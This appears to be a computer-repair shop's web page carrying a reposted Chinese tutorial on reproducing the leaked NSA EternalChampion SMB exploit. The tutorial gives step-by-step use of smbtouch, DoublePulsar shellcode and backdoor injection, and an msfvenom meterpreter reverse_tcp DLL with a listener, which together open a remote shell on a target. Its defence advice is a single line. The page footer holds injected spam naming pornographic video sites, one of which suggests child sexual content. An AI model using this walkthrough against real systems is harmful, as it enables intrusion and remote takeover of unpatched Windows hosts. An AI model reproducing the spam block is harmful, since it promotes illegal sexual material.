錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
復現NSA武器庫之Eternalchampion(永恒冠軍)

作者: 佚名  日期:2017-05-27 12:09:53   來源: 本站整理

 一、準備工作
此次配置環境和上篇差不多
攻擊機1
帶有漏洞利用工具集的XP,并且此次需要準備好WinHex, IP 172.26.97.35
攻擊機2
Kali, IP 172.26.97.226
靶機
Windows Server 2008 SP1 x86, IP 202.X.X.X,已經開啟445端口
開啟FuzzBunch
不知道怎么運行FuzzBunch的,請參考我的上篇博文,操作方式和上次一樣。TargetIP寫靶機IP 202.X.X.X,CallBack寫運行fb的IP,也就是172.26.97.35,不使用Redirection

二、開始
使用smbtouch探測
use smbtouch
execute
smbtouch會為我們探測出目標系統適用的漏洞利用程序

在這里我們可以看到,目標系統是32位的,EternalBlue和EternalSynergy不支持攻擊靶機,EternalRomance無法攻擊,只有EternalChampion可以。
使用Doublepulsar生成shellcode
smbtouch成功之后,我們使用Doublepulsar來生成shellcode
use Doublepulsar
我們一路回車默認,會發現多出來一個名為OutputInstall的選項,選擇這個

然后輸入路徑,比如說C:\shellcode.bin,一路回車執行就會生成shellcode
將shellcode轉換成HEX
由于EternalChampion需要的是ShellcodeBuffer而不是ShellcodeFile,所以這里我們需要將Doublepulsar生成的shellcode轉換成十六進制;如果你用的是EternalRomance,那么應該用的是ShellcodeFile,可以跨過此步
使用WinHex打開我們剛剛生成的shellcode.bin,然后選擇Edit-Copy All-Hex Values,如下圖所示:

使用EternalChampion進行攻擊
現在shellcode已經在我們的剪貼板中了,我們就要使用EternalChampion來進行攻擊了。
use EternalChampion
在之后我們一路回車默認,信息應該都是和目標系統相符的。在Mode :: Delivery mechanism時像上次一樣選擇FB一路回車,在程序提示ShellcodeBuffer :: DOPU Shellcode buffer時右鍵粘貼進那一堆十六進制,由于Shellcode比較長(4KB),所以可能會花幾秒鐘才會粘貼完。

在之后我們一路回車默認,信息應該都是和目標系統相符的。在Mode :: Delivery mechanism時像上次一樣選擇FB。

之后程序會進行詢問,我們回車就能夠運行EternalChampion
啊喲, 贏了,金牌,NSA你們這群人真幽默……

注意:如果你是用的exploit需要Shellcode File,那么這里直接輸入shellcode的路徑,本例中為C:\shellcode.bin,推薦把shellcode放在根目錄,據GitHub上某人的回復,如果放在某個目錄下可能會導致exploit不認。
使用Doublepulsar注入惡意dll
在這之后,我們使用Doublepulsar注入惡意dll,和上次操作基本一致,這里我們就再復述下吧
但是在此之前,我想看看后門是否存在,那就Doublepulsar中的選擇function: 1 ping,就可以確定后門是否存在啦

好,咱還是生成惡意dll并用Doublepulsar注入吧!
msfvenom生成惡意dll
切換到Kali,此次就使用reverse_tcp了
#32位操作系統,所以生成32位的dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.97.226 LPORT=8089 -f dll >badbad.dll
#打開MetaSploit,開始監聽
set PAYLOAD windows/x64/meterpreter/reverse_tcp
use exploit/multi/handler
set LHOST172.26.97.226
set LPORT 8089
run
之后將這個dll拷貝到XP中,使用Python創建個http服務器
python –m SimpleHTTPServer 80
拿起久違的IE,下載這個badbad.dll文件
注入dll
use DoublePulsar
一路回車默認,只需要選擇function 2 Run DLL,輸入我們的dll文件路徑

然后最后直接運行,就會發現反彈成功,拿到權限了!
啊喲,執行不了meterpreter命令?
在一些情況下,我們可能會拿到meterpreter的會話,但是可能會發現執行不了啥命令,ping下不通了,猜測目標機器藍屏了,那咋辦呢?
等等直到ping通,然后再次運行EternalChampion攻擊,它會記得我們輸入的shellcode,所以一路回車,然后再次運行Doublepulsar,在程序提示ProcessName [lsass.exe]:選擇其他的以NT Authority\System運行的進程名,比如說spoolsv.exe, SearchIndexer.exe, lsm.exe,這就自己試試了。然后就應該不會藍屏啦~
其實選擇啥進程其實都是可以的,大不了運行meterpreter的時候migrate到其他進程就可以了。
三、后記
EternalBlue支持的系統
通過查看xml文件能發現,有點奇怪,EternalBlue的配置文件中支持了這么多系統,但是有時卻報告不支持。

大家能看到,EternalBlue和EternalChampion是在Windows\Specials這個目錄下,Special,足以看到這倆工具威力是多么巨大吧!真是可怕……
防范手段
安裝SM17-010補丁,開啟防火墻過濾445,關閉SMB服務。
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 国产丝袜无码一区二区视频| 18禁无遮拦无码国产在线播放| 亚洲av午夜国产精品无码中文字| 亚洲另类无码专区首页| 无码人妻久久一区二区三区蜜桃| 国产成人A人亚洲精品无码| 无码精品A∨在线观看| 亚洲精品无码99在线观看| 无码国产福利av私拍| 丰满少妇人妻无码| 精品亚洲av无码一区二区柚蜜| 一区二区三区人妻无码| 亚洲AV无码一区二区三区鸳鸯影院| 国产亚洲美日韩AV中文字幕无码成人| 无码人妻丰满熟妇区96| 亚洲精品无码Av人在线观看国产| 无码av大香线蕉伊人久久| 无码毛片AAA在线| 无码AV中文一区二区三区| 成人免费无码H在线观看不卡| 亚洲精品无码专区在线| 中文字幕乱偷无码av先锋蜜桃| 午夜福利无码不卡在线观看| 日日日日做夜夜夜夜无码| 东京热加勒比无码少妇| 特级无码毛片免费视频| 国产精品无码一区二区三区免费 | 亚洲AV日韩AV永久无码免下载| 无码A级毛片日韩精品| 免费无码又爽又刺激高潮的视频| 人妻丰满熟妇av无码区不卡| 无码人妻品一区二区三区精99| 中文字幕有码无码AV| 免费无码作爱视频| 亚洲午夜国产精品无码| 亚洲AV无码成人精品区在线观看 | 91久久精品无码一区二区毛片| 亚洲中文字幕无码一区| 亚洲成AV人片在线播放无码| 国产v亚洲v天堂无码网站| 小13箩利洗澡无码视频网站|